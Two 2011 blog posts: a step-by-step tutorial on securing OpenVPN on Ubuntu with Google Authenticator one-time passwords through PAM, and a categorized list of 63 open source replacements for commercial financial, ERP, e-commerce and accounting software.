Thursday, July 14, 2011

Securing OpenVPN With A One Time Password (OTP) On Ubuntu

So, you got yourself a nice OpenVPN box. People need to login with their certificates but... if their laptop is stolen anyone could login. Sure, you could add password login but thats a bit outdated. The solution for this is using a OTP (one time password).
This technique is being used by a lot of large corporations including banks. This tutorial shows you how to configure OpenVPN to add additional security.
This assumes you already have OpenVPN configured and working properly.

Getting the Google Authenticator

First we need to download the Google Authenticator code. This can be done using "hg". You might need to install mercurial, if so its just as easy as doing:
apt-get install mercurial
We also need some compile tools, so let's install a package of compilers (you can remove this when we're done):
apt-get install build-essential
Let's check out the sourcecode for the Google Authenticator system:
cd /tmp && hg clone https://google-authenticator.googlecode.com/hg/ google-authenticator && cd libpam
Ok, nice, so we now got it checked out. In order to make it work properly with OpenVPN we need to change the Makefile.
vim Makefile
Add the following line after the license part and before the .SUFFIXES:
LDFLAGS="-lpam"
Save the file and lets proceed, shall we? We need to compile this, so thats easy:
make
No errors? Good. It might be that you get an error about "displayQRCode". If so, you will need to make some changes to the makefile. If everything went as it should, you can just proceed.
find /usr/lib -name libdl.so
In the makefile, replace all 3 references to "/usr/lib/libdl.so" with the path you got (e.g. "/usr/lib/i386-linux-gnu/libdl.so"). Save it up, and re-run make. You should now be able to proceed just fine.
If it was compiled succesfully, proceed with installing it:
make install
We're done, let's proceed shall we?

Configuring OpenVPN to use PAM

Open up /etc/openvpn/server.conf and add the following line:
plugin /usr/lib/openvpn/openvpn-auth-pam.so openvpn
This will use PAM to provide additional means of authentication. The last part (openvpn) is the file in /etc/pam.d we'd like to use. Since we do not want it to interfere with other services (e.g. SSH or sudo) we just use a new file.
Restart OpenVPN to have it re-read the config file.

Configure PAM to authenticate using Google Authenticator

Create the file /etc/pam.d/openvpn:
cp /etc/pam.d/common-account /etc/pam.d/openvpn
vim /etc/pam.d/openvpn
Add the following line:
auth    required                        pam_google_authenticator.so
If you are using encrypted homedirectories, you will need to change that to:
auth    required                        pam_google_authenticator.so secret=/var/unencrypted-home/${USER}/.google_authenticator
We're finished with the PAM config. Obviously you can make it a lot more complex, for example by adding IP restrictions (no OTP on trusted IPS) or adding more security.

Configure Google Authenticator

Ok, so we have almost everything in place but the proper config. This should be done per-user. Either login as user (su - username or directly) and issue the command:
google-authenticator
This will present you with a few questions:
https://www.google.com/chart?chs=200x200&chld=M|0&cht=qr&chl=otpauth://totp/me@myserver%3Fsecret%XXXXXXXXXXXXX
Your new secret key is: XXXXXXXXXXXXXXXXX
Your verification code is 1234567
Your emergency scratch codes are:
11111111
22222222
33333333
44444444
55555555
Do you want me to update your "~/.google_authenticator" file (y/n)
Save the URL & info as we will need that later. Answer "y" and you will get the next question:
Do you want to disallow multiple uses of the same authentication
token? This restricts you to one login about every 30s, but it increases
your chances to notice or even prevent man-in-the-middle attacks (y/n)
You should also answer Y(es) here, as its far more secure to disallow reusable keys. Answer accordingly and the next question pops up:
By default, tokens are good for 30 seconds and in order to compensate for
possible time-skew between the client and the server, we allow an extra
token before and after the current time. If you experience problems with poor
time synchronization, you can increase the window from its default
size of 1:30min to about 4min. Do you want to do so (y/n)
30 seconds might not be too long, so we could increase the time limit. For me, 30 seconds is enough so i just answer N(o) here.
The final question:
If the computer that you are logging into isn't hardened against brute-force
login attempts, you can enable rate-limiting for the authentication module.
By default, this limits attackers to no more than 3 login attempts every 30s.
Do you want to enable rate-limiting (y/n)
For additional security you should answer (Y)es here.
Ok done! In case you do have encrypted homedirs you will need to do one additional step. Until they've implemented support for encrypted homedirs, you will have to put it outside of the encrypted homefolders.
Execute:
mkdir -p /var/unencrypted-home/${USER}/
cp .google_authenticator /var/unencrypted-home/${USER}/
chmod og-rwx /var/unencrypted-home/${USER}/ -R

Configuring the client

The client should have password logins as additional means of security. If you are using the NetworkManager addin for OpenVPN you can just switch it to certificate + password, else you will have to enable "auth-user-pass" in your VPN client config.

Wrapping up

Ok, so now we have:
  1. Installed Google Authenticator PAM module
  2. Enabled PAM support for OpenVPN
Install the Google Authenticator app, instructions for each mobile platform (Android, iOS, BlackBerry) can be found on the Google Knowledgebase.
Once you have installed the app, have it scan the barcode. The URL we received earlier (the google.com/chart... one) provides a QR code we can scan. Once we scan it, it will automatically configure the client.
So, the next time you login to your OpenVPN server you will be promped for an additional password. Provide the 6 digit passcode and you will gain access.

Wednesday, July 13, 2011

63 Open Source Replacements for Popular Financial Software

Whether you're looking for financial software to manage your personal finances, your small business or for a large enterprise, the open source community offers a lot of options.

The business-focused products are particularly robust, with a huge list of solutions, many of which offer commercial support and/or hosting.

We last updated our list of open source replacements for popular financial software about a year ago. This year, we've revisited the list, updating links and details and adding quite a few projects that we haven't featured before.

Please note that the applications are not listed in order of their quality or usefulness. Instead, they're organized by category and listed alphabetically within those categories

As always, please feel free to suggest any open source financial software that we might have missed in the comments section below.

Accounting

1. Edoceo Imperium Replaces QuickBooks, Sage Peachtree For small to medium-sized businesses, this Web-based accounting system includes basic CRM, job tracking and invoicing capabilities, as well as double-entry accounting. It also integrates with Google Calendar, Gmail and Google Maps.
Operating System: OS Independent

2. FrontAccounting Replaces QuickBooks Online
This Web-based accounting system also offers some ERP features like inventory and manufacturing modules. You can deploy it on your own Web server for free or use the fee-based on-demand version.
Operating System: OS Independent

3. GnuCash Replaces Quicken Home and Business
A good option for small business owners, GnuCash combines the features of a business accounting package with the features of a personal financial manager. Key capabilities include double-entry accounting, investment management, invoicing, accounts payable, accounts receiveable, Quicken data import and more.
Operating System: Windows, Linux, OS X

4. Lazy8 Ledger Replaces QuickBooks, Sage Peachtree, Microsoft Excel
Best for very small businesses, Lazy8 Ledger offers an alternative to doing your books by hand or with a simple spreadsheet program. However, it lacks the advanced features that larger companies are likely to need.
Operating System: Windows, Linux, OS X

5. LedgerSMB Replaces QuickBooks, Sage Peachtree
Also designed for small to medium-sized businesses, LedgerSMB includes general ledger, accounts payable and accounts receivable capabilities. It was originally based on the SQL-Ledger code and also offers some basic ERP functionality.
Operating System: Windows, Linux, OS X

6. osFinancials Replaces QuickBooks, Sage Peachtree
With an emphasis on simplicity, osFinancials aims to take the complications out of business accounting software. It can track up to 9999 accounts, 1 million creditors and debtors and 1 million stock items. Note: because it is developed by a team in the Netherlands, a lot of the osFinancials Web site and documentation is in Dutch, but English is also available.
Operating System: Windows, Linux

7. TurboCASH Replaces QuickBooks, Sage Peachtree
Designed to for small business owners, this alternative to QuickBooks and Sage offers a helpful feature comparison chart. It boasts more than 80,000 users, and although it was developed in the U.K., it has a chart of accounts and other features adapted for U.S. users as well.
Operating System: Windows

8. XIWA Replaces QuickBooks, Sage Peachtree
Short for "XIWA is Web accounting," XIWA is a mature, 12-year-old project with interfaces both for those who understand double-entry accounting and those who don't. It can handle multiple sets of books and multiple users, and it includes both payroll and investment tracking capabilities.
Operating System: Linux

Billing and Invoicing

9. Argentum Replaces FreshBooks, Bill.com
This Web-based app offers basic client management, invoicing and time tracking functionality. It's free to download and host on your own Web server, or you can use the service in the cloud for $10 per month.
Operating System: OS Independent

10. jBilling Replaces QuickTel
Designed for telecoms and companies that offer subscription-based services, jBilling boasts thousands of downloads per month. The software is available for free, but consulting, support and training require a fee.
Operating System: OS Independent

11. Simple Invoices Replaces FreshBooks, Bill.com
With this Web-based invoicing system, you can easily send your clients PDF invoices or create basic reports that let you track your sales. You can download the free version to a PC or a server, or you can purchase access on an SaaS basis from one of the third-party hosting providers listed on the site.
Operating System: OS Independent

12. Siwapp Replaces FreshBooks, Bill.com
This Web app was designed to be as simple as possible and offers a very easy-to-use interface. It creates attractive, professional-looking invoices that you can send to your clients and easy-to-understand reports that you can use to manage your small business.
Operating System: OS Independent

Business Intelligence (BI)

13. Jaspersoft Replaces SAP Netweaver, SAS, Oracle Business Intelligence, Cognos
The self-proclaimed "world's most widely used business intelligence software," Jaspersoft offers reporting, data analysis, data integration and dashboard functionality. In addition to two free community versions (Jaspersoft BI Community Edition and JasperReports Community Edition), it comes in four commercial editions: Jaspersoft BI Enterprise Edition, Jaspersoft BI Professional Edition, Jaspersoft BI Express Edition and JasperReports Professional.
Operating System: OS Independent

14. JMagallanes Replaces LogiXML, DBxtra
This Java-based app is based in part on JasperReports and JFreeChart. It reads from a number of data sources (SQL, Excel, XML and others) to create a variety of charts and tables.
Operating System: OS Independent

15. Palo BI Suite Replaces SAP Netweaver, SAS, Oracle Business Intelligence, Cognos
Used by more than 45,000 companies, Palo extends the capabilities of Microsoft Excel with OLAP technology. It's available in both community and premium editions, and you can also purchase a Palo mobile app for your smartphone or tablet.
Operating System: OS Independent

16. Pentaho Replaces SAP Netweaver, SAS, Oracle Business Intelligence, Cognos
Pentaho calls itself "the open source business intelligence leader," and claims to cut BI licensing costs by 90 percent. It comes in community or enterprise editions, and it's also available on an SaaS basis.
Operating System: Windows, Linux, OS X

E-Commerce
17. Broadleaf Commerce Replaces Big Commerce, Volusion, Yahoo Merchant
Broadleaf bills itself as "the most cost-effective enterprise e-commerce solution available." It's Java-based, easy-to-use, and integrates with Facebook and Twitter, as well as most databases and back-end systems.
Operating System: Windows, Linux, OS X

18. Magento Replaces Big Commerce, Volusion, Yahoo Merchant
Now owned by eBay, Magento is used by more than 100,000 merchants, including OfficeMax, Nokia, Harbor Freight Tools, The North Face and others. In addition to the free community version, it comes in professional or enterprise editions, and Magento Go offers hosting services.
Operating System: Windows, Linux

19. nopCommerce Replaces Big Commerce, Volusion, Yahoo Merchant
This .NET-based e-commerce package offers fast installation, search engine optimization, and maximum flexibility. It's PCI DSS compliant and supports features like anonymous checkout, gift cards, multiple currencies, live chat, inventory tracking, cross-selling, coupons, discounts and multiple payment and shipping options.
Operating System: Windows

20. osCommerce Replaces Big Commerce, Volusion, Yahoo Merchant
With more than 248,700 users and 10 years of development, osCommerce is a very popular, mature e-commerce solution. The site offers a showcase of more than 12,700 sites that have been developed using osCommerce, as well as an online demo.
Operating System: Windows, Linux, OS X

21. PrestaShop Replaces Big Commerce, Volusion, Yahoo Merchant
Award-winning PrestaShop is used by more than 75,000 different companies, and it's the number one open source e-commerce solution in Europe. It offers more than 265 features which you can see for yourself with the online demo.
Operating System: Windows, Linux, OS X

22. Order Portal Replaces Mainstreet Commerce, Yahoo Merchant
Order Portal is part of Randr Inc's Web Business Suite (WBS) for manufacturers, distributors and rental companies. It integrates with Google and PayPal and offers a long list of features, but it isn't quite as polished as some of the other open source e-commerce solutions on our list.
Operating System: Linux

23. Zen Cart Replaces Big Commerce, Volusion, Yahoo Merchant
Designed in part by online merchants, Zen Cart offers an intuitive interface for users without a background in programming or a degree in IT. Notable features include a newsletter manager, discount coupons, gift certificates, featured products, quantity discounts and more.
Operating System: Windows, Linux

Enterprise Resource Planning (ERP)
24. ADempiere ERP Business Suite Replaces SAP, Microsoft Dynamics
This fork of Compiere (see below) includes ERP, CRM and SCM capabilities. The link above offers the software download, but adempiere.com offers a wiki with a lot of other documentation for the project.
Operating System: Windows, Linux, OS X

25. Apache OFBiz Replaces NetSuite , Sage ERP
Sponsored by the Apache Software Foundation, the Open For Business Suite (OFBiz for short) incorporates ERP, CRM, e-commerce, SCM, MRP (manufacturing resources planning), CMMS/EAM (maintenance management system/enterprise asset management), POS and other capabilities. It's easy to customize the various components to your own needs, and the site offers a great deal of documentation and support.
Operating System: OS Independent

26. Compiere ERP + CRM Business Solution Replaces SAP, Microsoft Dynamics
Now owned by Consona Corporation, Compiere is a full-featured ERP solution that boasts TCO savings up to 80 percent versus commercial software. In addition to the free community version, it also comes in paid standard, professional and enterprise editions.
Operating System: Windows, Linux, OS X

27. Dolibarr ERP/CRM Replaces NetSuite , Sage ERP
Like NetSuite and Sage, Dolibarr ERP/CRM meets the needs of SMBs, foundations and freelancers. The website offers screenshots and an online demo so that you can see how it works. The basic software is free, but additional modules and add-ons are available through the Dolistore.
Operating System: OS Independent

28. EdgeERP Replaces NetSuite , Sage ERP
This fork of WebERP (see below) offers flexibility and the ability to integrate with many other types of software. Small businesses can use it to manage sales quotes, orders, invoicing, receivables, inventory, purchases, payables, banking, and general ledger accounting.
Operating System: OS Independent

29. ERP5 Replaces SAP http://www.microsoft.com/dynamics/en/us/default.aspx">Microsoft Dynamics
ERP 5 includes ERP, CRM, MRP, SCM, accounting, HR and PDM capabilities. It comes in a free community version, a supported enterprise version and an SaaS version called TioLive.
Operating System: Linux

30. JFire Replaces NetSuite , Sage ERP
This Java-based ERP system comes ready-to-use with a full set of features, but can also be customized to meet your company's unique needs. It includes both ERP and CRM functionality and also comes in a version for service-based businesses. Aditional information about the software can be found on the jFire community site or on the NightLabs site, which also offers support and services for JFire.
Operating System: OS Independent

31. Neogia Replaces NetSuite , Sage ERP
Another SMB tool, Neogia includes CRM, sub-contracting, manufacturing, finance, e-commerce, distribution and inventory management capabilities. Be warned that much of the documentation and website for this project is in French.
Operating System: Windows, Linux

32. Openbravo ERP Replaces SAP, Microsoft Dynamics
Downloaded more than 2 million times, Openbravo's ERP software emphasizes agility. It's available in three different editions: community, basic or professional. (Professional comes with paid support and is only available through an Openbravo partner.)
Operating System: OS Independent

33. Open ERP Replaces SAP Microsoft Dynamics
This modular solution incorporates CRM, accounting, point of sale, project management, warehouse management, human resources, purchasing, manufacturing, marketing, invoicing and an application builder. Visit the site to see how it compares with other open-source ERP solutions, as well as SAP and Microsoft Dynamics. In addition to the free version, it's available in a several commercial editions or on an SaaS basis from Odoo.
Operating System: Windows, Linux

34. opentaps Replaces SAP, Microsoft Dynamics
Used by Toyota, Honeywell and other well-known companies, Opentaps bills itself as "the most advanced Open Source ERP + CRM solution." It's available with either an open source license or a commercial license that includes support, and it's also available in the cloud through Amazon Web Services.
Operating System: Windows, Linux

35. Phreedom Replaces NetSuite , Microsoft Dynamics
This Web-based project for small businesses includes the PhreeBooks accounting software, plus modules for contacts, inventory, payment, report generation, help, and shipping. Other additional modules are available for a fee.
Operating System: OS Independent

36. Plazma ERP + CRM Replaces NetSuite , Sage ERP
This multi-function suite for SMBs offers a lot of CRM capabilities, along with a few ERP functions. The interface is bare-bones but easy to use, and while it comes with quite a bit of documentation, no paid support is available.
Operating System: Windows, Linux, OS X

37. Postbooks/xTuple ERP Replaces NetSuite , Sage ERP
xTuple's ERP suite includes accounting, sales, CRM, purchasing, product definition, inventory and distribution, light manufacturing and reporting capabilities. The Postbooks edition is available with either an open source or a commercial license, and the Standard, Project, Manufacturing or Enterprise editions are available only with a commercial license. It's also available in the cloud, and information about other related services is also on the website.
Operating System: Windows, Linux, Unix, OS X

38. ]project-open[ Replaces SAP http://www.microsoft.com/dynamics/en/us/default.aspx">Microsoft Dynamics
Designed for businesses with 3 to 3,000 employees, this application combines project management, service management and ERP functionality. And it boasts a client base of 3000 companies in 80 countries. Note that the full software is released under a mixed license, that is, parts are open-source, parts are available under a free commercial license, and parts are only available under a fee-based commercial license.
Operating System: OS Independent

39. SQL-Ledger Replaces NetSuite , Sage ERP
Another Web-based application, SQL-Ledger features double-entry accounting and ERP features and, as you might guess, stores data in a SQL database server. Paid support is available at a variety of price points.
Operating System: Windows, Linux, OS X

40. webERP Replaces NetSuite , Sage ERP
This popular app is downloaded an average of 5,000 times per month. While it can be used by any type of business, webERP is particularly well suited to the needs of wholesalers, distributors and manufacturing companies. Commercial support and hosting are available through third-party organizations.
Operating System: OS Independent

Human Resource Management (HRM)
41. Orange HRM Replaces iVantage, iCIMS
With more than 1 million users, Orange claims to be the "world’s most popular Open Source Human Resource Management Software." It tracks time and attendance, leave, recruiting performance, and employee information, and it's also available in an SaaS version.
Operating System: Windows, Linux, Unix, OS X

42. WaypointHR Replaces Epicor HCM, iCIMS
While not as mature as Orange, Waypoint also tracks employee records, pay, performance, leave and other HR information. Also, like Orange, it's available in a hosted "On Demand" version.
Operating System: OS Independent

Investment Tracking and Management
43. Chartsy Replaces StockMarketEye, Personal Stock Monitor, TradeTrakker
This stock charting and screening platform features a modular architecture that lets you install only the capabilities you need. The project owners plan to add trading capabilities in the future, but they aren't operational yet.
Operating System: Windows, Linux, OS X

44. JStock Replaces StockMarketEye, Personal Stock Monitor, TradeTrakker
For active investors, this app offers a stock watchlist, portfolio management, alerts, filters, charts, chat and more. It can track 26 stock markets around the world, and it can save your data in the cloud if you like.
Operating System: Windows, Linux, OS X

Microfinance
45. Mifos Replaces Loan Performer, Temeno Microfinance & Community Banking
This Web-based management information system (MIS) aims to help microfinance institutions streamline their operation. It offers portfolio and transaction management, on-the-fly financial product creation, in-depth client management, integrated social performance measurement, and a reporting engine.
Operating System: OS Independent

46. Octopus Replaces Loan Performer, Temeno Microfinance & Community Banking
Rated as "one of the most user-friendly solution with highly ergonomic windows display" by the World Bank/CGAP, Octopus offers a robust, secure MIS for microfinance organizations. It's available both in a free community version or a supported professional edition.
Operating System: Windows

Personal Financial Management
47. Buddi Replaces Quicken, Mint.com
Calling itself “personal budget software for the rest of us,” Buddi offers very simple installation and operation for users with little financial background. It's won multiple awards, but does not offer the same type of advanced features as Quicken.
Operating System: OS Independent

48. Grisbi Replaces Quicken Home and Business
While it doesn't offer double-entry accounting, Grisbi offers some business accounting features in addition to all the features you would expect in a personal finance manager. It's available in multiple languages and can handle multiple currencies.
Operating System: Windows, Linux

49. HomeBank Replaces Quicken, Mint.com
Under development since 1995, HomeBank offers an intuitive interface and easy-to-use reporting capabilities. Like many of the other apps on our list, it can import financial data from other sources, autocompletes entries whenever possible and provides budgeting capabilities.
Operating System: Linux

50. JGnash Replaces Quicken, Mint.com
Java-based JGnash supports double-entry or single-entry bookkeeping, account reconciliation, PDF report generation, multiple currencies, check printing and more. It can also import data from commercial financial software or online banking systems.
Operating System: Windows, Linux, OS X

51. KMyMoney Replaces Quicken, Mint.com
KDE's personal finance software is particularly user-friendly, with an interface that's easy for anyone who's used Quicken or similar software to understand. Previous versions of the software only worked on Linux, but the latest version also supports Windows (though it isn't completely stable).
Operating System: Windows, Linux, OS X

52. Money Manager Ex Replaces Quicken, Mint.com
This app claims to offer "all the basic features that 90% of users would want to see in a personal finance application." Notable features include AES encryption, the ability to run from a thumb drive without an install, depreciation tracking, international support and import from CSV and Quicken file formats.
Operating System: Windows, Linux, OS X

53. Yapbam Replaces Quicken, Mint.com
Java-based Yapbam (short for "yet another bank account manager") is cross-platform, portable and extensible. It can import data from other software and online banking, automatically generates reports and includes a currency converter.
Operating System: Windows, Linux, OS X

Professional Services Automation (PSA)
54. allocPSA Replaces NetSuite OpenAir, Projector PSA, Q360 This web-based suite calls itself "the premier online professional services automation solution." Key features include bookkeeping, project management, a dashboard, time tracking, to do lists, CRM, calendar, and much more, all designed specifically to meet the needs of professional service organizations. It's also available on an SaaS basis starting at $199 per year.
Operating System: OS Independent

Point-of-Sale (POS)
55. Floreant POS Replaces QuickBooks Point of Sale, AccuPOS
Used by the Denny's chain in New York, this restaurant-specific POS application offers a full set of capabilities to support fine dining, carry out, tax, discounts, food grouping, drawer pull, kitchen ticket, ESC/POS receipt, combined payment system and sales reports. Tow levels of commercial support are available, with prices varying based on response time and availability.
Operating System: OS Independent

56. LemonPOS Replaces QuickBooks Point of Sale, AccuPOS
Made for small, medium or micro businesses, LemonPOS integrates with scanners and thermal printers to track your store's sales. It stores data in a MySQL database, supports multiple terminals and offers good security including role-based permissions.
Operating System: Linux

57. POSper Replaces QuickBooks Point of Sale, AccuPOS
This app was designed for small retail stores and restaurants. It supports multiple touchscreens, scanners, card readers and ticket printers, and it integrates with all databases supported by Hibernate.
Operating System: OS Independent

Spreadsheets
58. Gnumeric Replaces Microsoft Excel, Lotus 1-2-3
This spreadsheet app for the Gnome desktop has been praised as more accurate than the leading proprietary spreadsheet. It can read existing files from Excel and similar programs, but is not meant to be a clone of any commercial program.
Operating System: Windows, Linux

59. KOffice KCells Replaces Microsoft Excel, Lotus 1-2-3
Formerly called "KSpread," this tool is part of KDE's KOffice suite. The interface has a menu on the right side of the screen that takes some getting used to, but it's easy to learn and has a very powerful formula builder tool.
Operating System: Windows, Linux

60. LibreOffice Calc Replaces Microsoft Excel, Lotus 1-2-3
Based on OpenOffice.org, LibreOffice offers a complete office productivity suite, including the Calc spreadsheet program. It offers a very mature set of advanced features and integrates with other database and spreadsheet software.
Operating System: Windows, Linux, OS X

61. OpenOffice.org Calc Replaces Microsoft Excel, Lotus 1-2-3
Very similar to Microsoft Excel, OpenOfficel.org's Calc program is particularly easy to use. It also reads and writes to Excel and other spreadsheet file formats, making it suitable for business use.
Operating System: Windows, Linux, OS X

Time Tracking
62. eHour Replaces Replicon, Timesheet.com
Best for freelancers, lawyers, consultants, and other companies that bill by the hour, eHour tracks the time employees spend per project and per client. You can run it on a standalone system or you can install it on your Tomcat server for employees to access via a browser.
Operating System: Windows, Linux, OS X

63. TimeTrex Replaces Replicon, Timesheet.com
This self-proclaimed "world's most popular open source payroll and time management software" includes modules for scheduling, attendance, job costing and payroll. In addition to the free standard edition, it comes in multiple commercial editions that can be deployed on site or in the cloud.
Operating System: Windows, Linux, OS X